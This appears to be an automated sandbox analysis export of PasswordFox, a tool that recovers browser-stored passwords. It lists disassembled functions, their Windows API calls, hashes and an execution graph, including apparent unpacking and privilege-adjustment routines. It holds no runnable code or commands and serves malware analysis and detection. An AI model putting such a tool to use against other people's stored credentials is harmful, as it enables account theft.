                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _snwprintfmemcpy
                                        • String ID: %2.2X
                                        • API String ID: 2789212964-323797159
                                        • Opcode ID: c99066928f9437aa7e551033cabbef0df198b6f8c8e597af9a43f68327a4c180
                                        • Instruction ID: a9002b0875575303a2987026f9fb1bf175ac1b43a81178ecf4e49226d2ebb4fd
                                        • Opcode Fuzzy Hash: c99066928f9437aa7e551033cabbef0df198b6f8c8e597af9a43f68327a4c180
                                        • Instruction Fuzzy Hash: E9115272900209BFDB50DFE8C882AAF73B9FB44714F108476EE15E7181D678EA158B95
                                        Function 00406EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • _snwprintf.MSVCRT ref: 00406ECE
                                        • _snwprintf.MSVCRT ref: 00406EEE
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _snwprintf$FileWritewcslen
                                        • String ID: %%-%d.%ds
                                        • API String ID: 889019245-2008345750
                                        • Opcode ID: 868302a9e02cd75f8354f8058d42a64734ba0f68fa388504d18fbb5dae66fb0c
                                        • Instruction ID: e143721a560c24b574496b3a283ef396d45c0151d4c93298e099853d173d25ff
                                        • Opcode Fuzzy Hash: 868302a9e02cd75f8354f8058d42a64734ba0f68fa388504d18fbb5dae66fb0c
                                        • Instruction Fuzzy Hash: A4019275240304AFDB10AB59CC82D5A77E9EB88318B01053EF946A72A2D635F951DBA8
                                        Function 00405FDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00405FF5
                                        • SendMessageW.USER32(00403113,0000105F,00000000,?), ref: 00406023
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessageSendmemset
                                        • String ID: "
                                        • API String ID: 568519121-123907689
                                        • Opcode ID: 2ae622bd2626f1aacff70f59a86f4a341843bd16d34e56bfea62d70f55bee892
                                        • Instruction ID: bc73b25eccc6807c1a63795b29de817f78dd97bbc701bd9d2aad54656d2c4010
                                        • Opcode Fuzzy Hash: 2ae622bd2626f1aacff70f59a86f4a341843bd16d34e56bfea62d70f55bee892
                                        • Instruction Fuzzy Hash: 3601A275900205EBDB20CF45C885EABB7B8FF80745F11402AE881B6281D3359E95CB79
                                        Function 00405810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: TextWindowmemset
                                        • String ID: caption
                                        • API String ID: 2590972913-4135340389
                                        • Opcode ID: 0fcc5cf7fb10eb742ef7212aa95dbfacf46bc68522d4b0609645f212bcb06b33
                                        • Instruction ID: df80af938675ecbf3287059fad7e6b069a73c638d1509468611f52464be81b01
                                        • Opcode Fuzzy Hash: 0fcc5cf7fb10eb742ef7212aa95dbfacf46bc68522d4b0609645f212bcb06b33
                                        • Instruction Fuzzy Hash: 32F08132940718AAFB207790DC8EB973668DB04710F444076FE04B61D2D7B8AD84CE9C
                                        Function 004018C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PlacementWindowmemset
                                        • String ID: WinPos
                                        • API String ID: 4036792311-2823255486
                                        • Opcode ID: 5052010143d1387a6fe5ae6b726869f0e7121bcf886364b26e52eb317d2e6143
                                        • Instruction ID: 891a523d76eb80ac23909987fbe7a34fa85cc5b30c9ee4295a6a184e028cc620
                                        • Opcode Fuzzy Hash: 5052010143d1387a6fe5ae6b726869f0e7121bcf886364b26e52eb317d2e6143
                                        • Instruction Fuzzy Hash: FEF04FB1600204EFEB04DF94D999F6A33A8EF04700F140179F909EB1D1D7B8A900CB69
                                        Function 00408C64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00408C8C
                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00408C9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??3@CurrentDirectory
                                        • String ID: ]`@
                                        • API String ID: 3082378999-2281983686
                                        • Opcode ID: dc99835a84fa40df20e35a936bb5fea986788c39caf072bddb3a135d5646a1bf
                                        • Instruction ID: eb7365baeae3a5b06f30f4f5dc53f0f83de17f426ffce70ccee701f3d2314ce1
                                        • Opcode Fuzzy Hash: dc99835a84fa40df20e35a936bb5fea986788c39caf072bddb3a135d5646a1bf
                                        • Instruction Fuzzy Hash: 6AE09A32005702CAD3206F64EA08B97B3F9AF80725F11823FE08973280DB78A450CBA8
                                        Function 004058E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004058F6
                                        • _itow.MSVCRT ref: 00405904
                                          • Part of subcall function 0040593F: memset.MSVCRT ref: 00405962
                                          • Part of subcall function 0040593F: GetPrivateProfileStringW.KERNEL32(0040FDA8,00000000,0040C3EC,?,00001000,0040FB98), ref: 00405988
                                          • Part of subcall function 0040593F: wcscpy.MSVCRT ref: 004059A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memset$PrivateProfileString_itowwcscpy
                                        • String ID: `$@
                                        • API String ID: 3901012872-815968772
                                        • Opcode ID: a52f3a6f5e7c06b2e4ef3cdf612b0be2bf477317c706a0e1cef859a158c42064
                                        • Instruction ID: 97705da9659c9a3d0b8293794e97ff1ce276b965d97d82d753a4d3b1ca5179b9
                                        • Opcode Fuzzy Hash: a52f3a6f5e7c06b2e4ef3cdf612b0be2bf477317c706a0e1cef859a158c42064
                                        • Instruction Fuzzy Hash: 3CE0BF7190020DF6EF10BBA1CC46F9D776CAB04748F004025B915B51D2E774A6158B9A
                                        Function 00405ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040455F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00404577,?,00403725,?,00000104), ref: 0040456A
                                        • wcsrchr.MSVCRT ref: 00405ED9
                                        • wcscat.MSVCRT ref: 00405EEF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileModuleNamewcscatwcsrchr
                                        • String ID: _lng.ini
                                        • API String ID: 383090722-1948609170
                                        • Opcode ID: dbc4aa386498fdcc5a9e47a1312a2b6bce87ebe8e1006e5965a30aba6ab08d06
                                        • Instruction ID: e6667663987ec2e796af49d1c246636855323936fd01b5f2f3949006dd472c6d
                                        • Opcode Fuzzy Hash: dbc4aa386498fdcc5a9e47a1312a2b6bce87ebe8e1006e5965a30aba6ab08d06
                                        • Instruction Fuzzy Hash: 40C012A2552A10A4E1223722AC43F6F2698CF12304F20003BFA00741C3EBBD974141EE
                                        Function 00404DBA Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcslen.MSVCRT ref: 00404DC7
                                        • free.MSVCRT ref: 00404DEA
                                          • Part of subcall function 004044DF: malloc.MSVCRT ref: 004044FB
                                          • Part of subcall function 004044DF: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004025D1,00000002,?,?,?,00401C46,?), ref: 00404513
                                          • Part of subcall function 004044DF: free.MSVCRT ref: 0040451C
                                        • free.MSVCRT ref: 00404E0D
                                        • memcpy.MSVCRT(?,?,?), ref: 00404E31
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: free$memcpy$mallocwcslen
                                        • String ID:
                                        • API String ID: 726966127-0
                                        • Opcode ID: 20036088783e96ef4255c6f0e365a063d5daffbdf19fe68d509660aae9788dff
                                        • Instruction ID: 8d9795adf50868bdc10155fdcea5b5fc59c421547f0e70d27590742da84e4b79
                                        • Opcode Fuzzy Hash: 20036088783e96ef4255c6f0e365a063d5daffbdf19fe68d509660aae9788dff
                                        • Instruction Fuzzy Hash: F5216DB1100604EFC730DF58D881D9AB7F5EF883247108A2EF952A76D2DB35B915CB98

                                        Execution Graph

                                        Execution Coverage:11.5%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:8.9%
                                        Total number of Nodes:872
                                        Total number of Limit Nodes:27
                                        execution_graph 4360 40cd51 4363 40cc39 4360->4363 4362 40cd71 4364 40cc45 4363->4364 4365 40cc57 GetPrivateProfileIntA 4363->4365 4368 40cb45 memset _itoa WritePrivateProfileStringA 4364->4368 4365->4362 4367 40cc52 4367->4362 4368->4367 4382 405759 GetFileAttributesA 4369 418f70 4370 418f88 4369->4370 4371 419082 LoadLibraryA 4370->4371 4372 4190c7 VirtualProtect VirtualProtect 4370->4372 4376 419099 4371->4376 4373 4190fb 4372->4373 4373->4373 4374 4190ab GetProcAddress 4375 4190c1 ExitProcess 4374->4375 4374->4376 4376->4370 4376->4374 4384 40cd7b 4387 40cb91 4384->4387 4388 40cb9e 4387->4388 4389 40cbe8 memset GetPrivateProfileStringA 4388->4389 4390 40cbad memset 4388->4390 4395 405d8b strlen 4389->4395 4400 405d12 4390->4400 4394 40cc31 4396 405da1 4395->4396 4397 405d9f 4395->4397 4398 405dee 4396->4398 4399 405dd0 strtoul 4396->4399 4397->4394 4398->4394 4399->4396 4401 405d23 4400->4401 4402 405d7b WritePrivateProfileStringA 4400->4402 4401->4402 4403 405d2a sprintf memcpy 4401->4403 4402->4394 4403->4401 4403->4402 4404 40d4fc 4423 40d6e8 4404->4423 4406 40d508 GetModuleHandleA 4407 40d51a __set_app_type __p__fmode __p__commode 4406->4407 4409 40d5ac 4407->4409 4410 40d5c0 4409->4410 4411 40d5b4 __setusermatherr 4409->4411 4424 40d6d4 _controlfp 4410->4424 4411->4410 4413 40d5c5 _initterm __getmainargs _initterm 4414 40d61c GetStartupInfoA 4413->4414 4416 40d650 GetModuleHandleA 4414->4416 4425 40b97b 4416->4425 4420 40d681 _cexit 4422 40d6b6 4420->4422 4421 40d67a exit 4421->4420 4423->4406 4424->4413 4472 403f00 LoadLibraryA 4425->4472 4427 40b98f 4428 40b993 4427->4428 4480 40cec5 4427->4480 4428->4420 4428->4421 4431 40b9d5 MessageBoxA 4431->4428 4432 40b9ed 4484 409e6b 4432->4484 4434 40b9f2 4493 40b69d ??2@YAPAXI 4434->4493 4441 40ba46 4525 407f9c memset 4441->4525 4442 40ba5a 4530 407e6b memset 4442->4530 4447 40bb94 ??3@YAXPAX 4450 40bbb2 DeleteObject 4447->4450 4451 40bbc6 4447->4451 4448 40632f _strcmpi 4449 40ba70 4448->4449 4452 40ba74 RegDeleteKeyA 4449->4452 4453 40ba89 4449->4453 4450->4451 4557 405f72 free free 4451->4557 4452->4447 4455 40baa7 CoInitialize 4453->4455 4535 40b81a 4453->4535 4556 40b61e GetModuleHandleA RegisterClassA GetModuleHandleA CreateWindowExA 4455->4556 4456 40bbd7 4558 4065a2 4456->4558 4461 40bab7 6 API calls 4465 40bb20 4461->4465 4466 40bb8e CoUninitialize 4461->4466 4467 40bb26 TranslateAccelerator 4465->4467 4469 40bb58 IsDialogMessage 4465->4469 4470 40bb4c IsDialogMessage 4465->4470 4466->4447 4467->4465 4468 40bb80 GetMessageA 4467->4468 4468->4466 4468->4467 4469->4468 4471 40bb6a TranslateMessage DispatchMessageA 4469->4471 4470->4468 4470->4469 4471->4468 4473 403f2b GetProcAddress 4472->4473 4477 403f53 4472->4477 4474 403f44 FreeLibrary 4473->4474 4475 403f3b 4473->4475 4476 403f4f 4474->4476 4474->4477 4475->4474 4476->4477 4478 403f63 MessageBoxA 4477->4478 4479 403f7a 4477->4479 4478->4427 4479->4427 4481 40b99e SetErrorMode GetModuleHandleA EnumResourceTypesA 4480->4481 4482 40cece LoadLibraryA 4480->4482 4481->4431 4481->4432 4482->4481 4483 40cee2 GetProcAddress 4482->4483 4483->4481 4562 40bfa0 GetCurrentProcess 4484->4562 4487 40bfa0 10 API calls 4488 409e8e 4487->4488 4489 40bfa0 10 API calls 4488->4489 4490 409e9b 4489->4490 4491 409ea1 FreeLibrary 4490->4491 4492 409eaa 4490->4492 4491->4492 4492->4434 4494 40b6c9 ??2@YAPAXI 4493->4494 4496 40b6f2 4494->4496 4497 40b6f7 4494->4497 4595 402871 4496->4595 4499 40b748 4497->4499 4500 40b73b DeleteObject 4497->4500 4587 4058bd 4499->4587 4500->4499 4502 40b74d 4590 401000 4502->4590 4506 40b77b 4507 4061bd 4506->4507 4610 405f72 free free 4507->4610 4509 406303 4623 4060d5 4509->4623 4512 4062d8 4512->4509 4634 40609f 4512->4634 4513 40609f malloc memcpy free free 4519 4061f8 4513->4519 4515 40627c free 4515->4519 4519->4509 4519->4512 4519->4513 4519->4515 4611 405f98 4519->4611 4626 405708 4519->4626 4520 405f98 7 API calls 4520->4509 4521 40632f 4523 406337 4521->4523 4524 406356 4521->4524 4522 406340 _strcmpi 4522->4523 4522->4524 4523->4522 4523->4524 4524->4441 4524->4442 4639 407f76 4525->4639 4527 407fce GetModuleHandleA 4644 407ea8 4527->4644 4531 407f76 3 API calls 4530->4531 4532 407e9a 4531->4532 4666 407de3 4532->4666 4680 401e6e 4535->4680 4539 40b96f 4539->4447 4539->4455 4540 40b887 _strcmpi 4541 40b868 4540->4541 4541->4539 4541->4540 4543 40b8c1 4541->4543 4742 40b784 _strcmpi 4541->4742 4543->4539 4696 40ae0f 4543->4696 4547 40b8dc 4721 409732 4547->4721 4555 40b968 ??3@YAXPAX 4555->4539 4556->4461 4557->4456 4559 4065a8 free 4558->4559 4560 4065af 4558->4560 4559->4560 4561 405f72 free free 4560->4561 4561->4428 4578 40bf6b 4562->4578 4565 40bfc1 GetLastError 4567 409e81 4565->4567 4566 40bfc9 4584 40bf4b 4566->4584 4567->4487 4569 40bfce 4570 40bff1 4569->4570 4571 40bfda GetProcAddress 4569->4571 4573 40bf4b LoadLibraryA 4570->4573 4571->4570 4572 40bfe7 LookupPrivilegeValueA 4571->4572 4572->4570 4574 40c00a 4573->4574 4575 40c028 GetLastError CloseHandle 4574->4575 4576 40c00e GetProcAddress 4574->4576 4575->4567 4576->4575 4577 40c01b AdjustTokenPrivileges 4576->4577 4577->4575 4579 40bf4b LoadLibraryA 4578->4579 4580 40bf76 4579->4580 4581 40bf99 4580->4581 4582 40bf7a GetProcAddress 4580->4582 4581->4565 4581->4566 4582->4581 4583 40bf8b 4582->4583 4583->4581 4585 40bf50 LoadLibraryA 4584->4585 4586 40bf67 4584->4586 4585->4569 4586->4569 4598 40579f memset _mbscpy 4587->4598 4589 4058d4 CreateFontIndirectA 4589->4502 4591 40102c 4590->4591 4592 401030 GetModuleHandleA LoadIconA 4591->4592 4593 40100d strncat 4591->4593 4594 4016f8 _mbscpy 4592->4594 4593->4591 4594->4506 4599 408104 4595->4599 4597 402879 4597->4497 4598->4589 4609 405b39 memset 4599->4609 4601 408117 ??2@YAPAXI 4602 40812e ??2@YAPAXI 4601->4602 4604 40814f ??2@YAPAXI 4602->4604 4606 408170 ??2@YAPAXI 4604->4606 4608 408191 4606->4608 4608->4597 4609->4601 4610->4519 4612 405fb2 4611->4612 4613 405fa6 strlen 4611->4613 4614 405fd3 4612->4614 4615 405fca free 4612->4615 4613->4612 4617 405708 3 API calls 4614->4617 4616 405fdd 4615->4616 4618 405ff6 4616->4618 4619 405fed free 4616->4619 4617->4616 4621 405708 3 API calls 4618->4621 4620 406002 memcpy 4619->4620 4620->4519 4622 406001 4621->4622 4622->4620 4624 4060e5 4623->4624 4625 4060db free 4623->4625 4624->4521 4625->4624 4627 405755 4626->4627 4628 40570f malloc 4626->4628 4627->4519 4630 405730 4628->4630 4631 40574b 4628->4631 4632 405744 free 4630->4632 4633 405734 memcpy 4630->4633 4631->4519 4632->4631 4633->4632 4635 4060b8 4634->4635 4636 4060ad free 4634->4636 4638 405708 3 API calls 4635->4638 4637 4060c3 4636->4637 4637->4520 4638->4637 4655 40576e GetModuleFileNameA 4639->4655 4641 407f7c strrchr 4642 407f8b 4641->4642 4643 407f8e _mbscat 4641->4643 4642->4643 4643->4527 4656 40d740 4644->4656 4649 407a83 3 API calls 4650 407ef0 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 4649->4650 4651 407f3c LoadStringA 4650->4651 4652 407f52 4651->4652 4652->4651 4653 407f6a 4652->4653 4663 407af1 _itoa 4652->4663 4653->4447 4655->4641 4657 407eb5 _mbscpy _mbscpy 4656->4657 4658 407a83 4657->4658 4659 40d740 4658->4659 4660 407a90 memset GetPrivateProfileStringA 4659->4660 4661 407aeb 4660->4661 4662 407adb WritePrivateProfileStringA 4660->4662 4661->4649 4662->4661 4664 407a83 3 API calls 4663->4664 4665 407b23 4664->4665 4665->4652 4676 405759 GetFileAttributesA 4666->4676 4668 407dec 4669 407df1 _mbscpy _mbscpy GetPrivateProfileIntA 4668->4669 4670 407e65 4668->4670 4677 4079ef GetPrivateProfileStringA 4669->4677 4670->4448 4672 407e40 4678 4079ef GetPrivateProfileStringA 4672->4678 4674 407e51 4679 4079ef GetPrivateProfileStringA 4674->4679 4676->4668 4677->4672 4678->4674 4679->4670 4788 4083bc 4680->4788 4683 40a46e 4684 40632f _strcmpi 4683->4684 4688 40a486 4684->4688 4685 40a4df 4686 40632f _strcmpi 4685->4686 4687 40a4f0 4686->4687 4689 40632f _strcmpi 4687->4689 4688->4685 4829 4056de strlen 4688->4829 4691 40a502 4689->4691 4693 40632f _strcmpi 4691->4693 4692 40a4be 4694 4056de 2 API calls 4692->4694 4695 40a514 4693->4695 4694->4685 4695->4541 4697 40ae2b memset GetModuleFileNameA strrchr 4696->4697 4698 40aeec 4696->4698 4699 40ae6b 4697->4699 4700 40ae6e _mbscat _mbscpy _mbscpy 4697->4700 4705 40a274 4698->4705 4699->4700 4701 40aed8 4700->4701 4832 4017ea 4701->4832 4706 40a2d3 4705->4706 4712 40a288 4705->4712 4862 4053d7 LoadCursorA SetCursor 4706->4862 4708 40a2d8 4863 405476 CreateFileA 4708->4863 4864 40c8ba 4708->4864 4875 40c8a3 4708->4875 4878 402454 4708->4878 4709 40a28f _strcmpi 4709->4712 4710 40a2ec 4711 40632f _strcmpi 4710->4711 4715 40a2fc 4711->4715 4712->4706 4712->4709 4915 409d09 4712->4915 4713 40a344 SetCursor 4713->4547 4715->4713 4716 40a33b qsort 4715->4716 4716->4713 4722 4085dd 3 API calls 4721->4722 4723 409744 4722->4723 4724 409755 GetStdHandle 4723->4724 4725 40974c 4723->4725 4726 409752 4724->4726 5433 40548f CreateFileA 4725->5433 4728 40976b 4726->4728 4729 40985e 4726->4729 5434 4053d7 LoadCursorA SetCursor 4728->5434 4731 4054ec 9 API calls 4729->4731 4732 409867 4731->4732 4732->4539 4755 40c91f 4732->4755 4733 409778 4734 4097ba 4733->4734 4740 4097d4 4733->4740 5435 408cb7 4733->5435 4734->4740 5441 40921e 4734->5441 4737 409807 4738 409850 SetCursor 4737->4738 4739 409847 CloseHandle 4737->4739 4738->4732 4739->4738 4740->4737 5451 4054ec 4740->5451 4743 40b795 4742->4743 4744 40b799 _strcmpi 4742->4744 4743->4541 4745 40b7aa 4744->4745 4746 40b7ae _strcmpi 4744->4746 4745->4541 4747 40b7c3 _strcmpi 4746->4747 4748 40b7bf 4746->4748 4749 40b7d4 4747->4749 4750 40b7d8 _strcmpi 4747->4750 4748->4541 4749->4541 4751 40b7e9 4750->4751 4752 40b7ed _strcmpi 4750->4752 4751->4541 4753 40b802 _mbsicmp 4752->4753 4754 40b7fe 4752->4754 4753->4541 4754->4541 4758 40c92d 4755->4758 4756 40c8a3 FreeLibrary 4757 40b95c 4756->4757 4759 4067fd 4757->4759 4758->4756 4760 40337e CryptReleaseContext 4759->4760 4761 40680f 4760->4761 4762 406821 4761->4762 4763 406816 FreeLibrary 4761->4763 4764 4060d5 free 4762->4764 4763->4762 4765 406829 4764->4765 5467 405f72 free free 4765->5467 4767 406831 5468 405f72 free free 4767->5468 4769 406839 5469 405f72 free free 4769->5469 4771 406841 4772 408211 4771->4772 4773 4081ab 5 API calls 4772->4773 4774 40821f 4773->4774 4775 408232 4774->4775 4776 4060d5 free 4774->4776 4778 4060d5 free 4775->4778 4780 408245 4775->4780 4777 40822b ??3@YAXPAX 4776->4777 4777->4775 4781 40823e ??3@YAXPAX 4778->4781 4779 408258 4784 4060d5 free 4779->4784 4786 40826b 4779->4786 4780->4779 4782 4060d5 free 4780->4782 4781->4780 4783 408251 ??3@YAXPAX 4782->4783 4783->4779 4785 408264 ??3@YAXPAX 4784->4785 4785->4786 4787 40829c free 4786->4787 4787->4555 4789 4083ce 4788->4789 4802 4081ab 4789->4802 4792 40842a memcpy memcpy 4793 4084b1 4792->4793 4798 408484 4792->4798 4793->4792 4794 4084c2 ??2@YAPAXI ??2@YAPAXI 4793->4794 4796 4084fe ??2@YAPAXI 4794->4796 4799 408535 4794->4799 4795 407520 15 API calls 4795->4798 4796->4799 4798->4793 4798->4795 4799->4799 4812 40833c 4799->4812 4801 401e7d 4801->4683 4803 4081b6 ??3@YAXPAX 4802->4803 4804 4081bd 4802->4804 4803->4804 4805 4081c4 ??3@YAXPAX 4804->4805 4806 4081cb 4804->4806 4805->4806 4807 4081d5 ??3@YAXPAX 4806->4807 4808 4081dc 4806->4808 4807->4808 4809 4081fc ??2@YAPAXI ??2@YAPAXI 4808->4809 4810 4081f5 ??3@YAXPAX 4808->4810 4811 4081ec ??3@YAXPAX 4808->4811 4809->4792 4810->4809 4811->4810 4813 4060d5 free 4812->4813 4814 408345 4813->4814 4815 4060d5 free 4814->4815 4816 40834d 4815->4816 4817 4060d5 free 4816->4817 4818 408355 4817->4818 4819 4060d5 free 4818->4819 4820 40835d 4819->4820 4821 40609f 4 API calls 4820->4821 4822 408370 4821->4822 4823 40609f 4 API calls 4822->4823 4824 40837a 4823->4824 4825 40609f 4 API calls 4824->4825 4826 408384 4825->4826 4827 40609f 4 API calls 4826->4827 4828 40838e 4827->4828 4828->4801 4830 4056f2 memcpy 4829->4830 4831 4056ef 4829->4831 4830->4692 4831->4830 4833 40181b memset 4832->4833 4834 4017fb 4832->4834 4835 40182e 4833->4835 4834->4835 4836 401805 GetWindowPlacement 4834->4836 4837 40184e 4835->4837 4845 401851 4835->4845 4836->4835 4839 4082d1 4837->4839 4840 4082e0 4839->4840 4842 4082ee 4839->4842 4852 40807f 4840->4852 4843 408339 4842->4843 4857 407fe4 4842->4857 4843->4698 4846 401860 4845->4846 4847 4018da 4845->4847 4846->4847 4848 401894 GetSystemMetrics 4846->4848 4847->4837 4848->4847 4849 4018a8 GetSystemMetrics 4848->4849 4849->4847 4850 4018b6 4849->4850 4850->4847 4851 4018bf SetWindowPos 4850->4851 4851->4847 4853 4080e5 4852->4853 4854 40808e memset 4852->4854 4853->4842 4854->4853 4855 4080a5 SendMessageA 4854->4855 4856 4080d0 4855->4856 4856->4853 4856->4855 4858 408077 4857->4858 4859 407ff6 4857->4859 